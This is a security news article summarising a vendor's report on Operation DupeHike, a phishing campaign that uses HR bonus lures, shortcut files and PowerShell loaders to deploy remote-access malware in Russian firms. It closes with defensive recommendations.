Seqrite Labs has exposed a targeted cyber‑espionage campaign, dubbed Operation DupeHike, that abuses routine HR bonus communications to infiltrate Russian enterprises. By disguising multi‑stage malware as a “Bonus 2025” document and abusing trusted tools like PowerShell, the UNG0902 threat group is demonstrating how everyday workflows can be weaponised against finance, HR, and administrative teams at scale.
How Operation DupeHike Works
The campaign begins with convincing emails about annual bonuses, framed as 15% of salary and referencing performance rules that mirror standard HR language. Attached is a ZIP archive containing a shortcut file that appears to be a benign PDF, but clicking it silently triggers a PowerShell script to download the first malware stage from a remote server.
This “loader” then pulls a second payload masquerading as a font file, which inspects running processes such as Notepad or Microsoft Edge and injects itself into them for stealth. Once established, it deploys AdaptixC2, a remote access framework that allows attackers to exfiltrate files, monitor activity, and execute commands, effectively turning compromised machines into espionage footholds inside corporate networks.
Infrastructure, Evasion and Tradecraft
Seqrite’s APT research team detected Operation DupeHike on 21 November 2025, tracing the malicious infrastructure to Russian hosting providers. The attackers initially used exposed web ports and then shifted to more secure configurations after detection, signalling active operational security and agility in response to scrutiny.
The tradecraft follows a classic multi‑step pattern: well-crafted social lure, shortcut abuse, hidden download, process injection, and remote control. By pivoting quickly between open and encrypted channels, UNG0902 reduces the chances of simple network‑based detection while maintaining persistent control over infected endpoints.
Why HR, Payroll and Admin Are Prime Targets
The campaign zeroes in on HR, payroll, and internal admin teams—functions that routinely handle salary, personal data, and policy communications. Because staff in these departments expect bonus notifications and attachments, they are more likely to trust and open such files, allowing the lure to bypass basic user suspicion.
Compromise in these areas is particularly damaging: attackers can access sensitive PII, payroll records, and internal documentation, and may use hijacked accounts to launch secondary attacks across finance, leadership, or wider employee bases. The campaign underscores that “back‑office” teams are now front‑line targets in espionage and fraud operations.
Defensive Lessons and Recommended Controls
Seqrite advises enterprises that no organisation is immune to such context‑aware campaigns and that basic technical controls must be paired with user vigilance. Recommended measures include regular awareness programmes that train employees to question unexpected attachments—even from HR—verify via secondary channels, and treat bonus or policy emails as potential phishing vectors.
On the technical side, organisations should restrict PowerShell usage, monitor for suspicious or unsigned script execution, enforce least‑privilege on endpoints, and deploy behavioural tools capable of detecting code injection and abnormal process activity. Seqrite has already rolled out full protection updates across its product portfolio, blocking all identified components of Operation DupeHike and sharing indicators of compromise with customers and law enforcement to help dismantle attacker infrastructure.
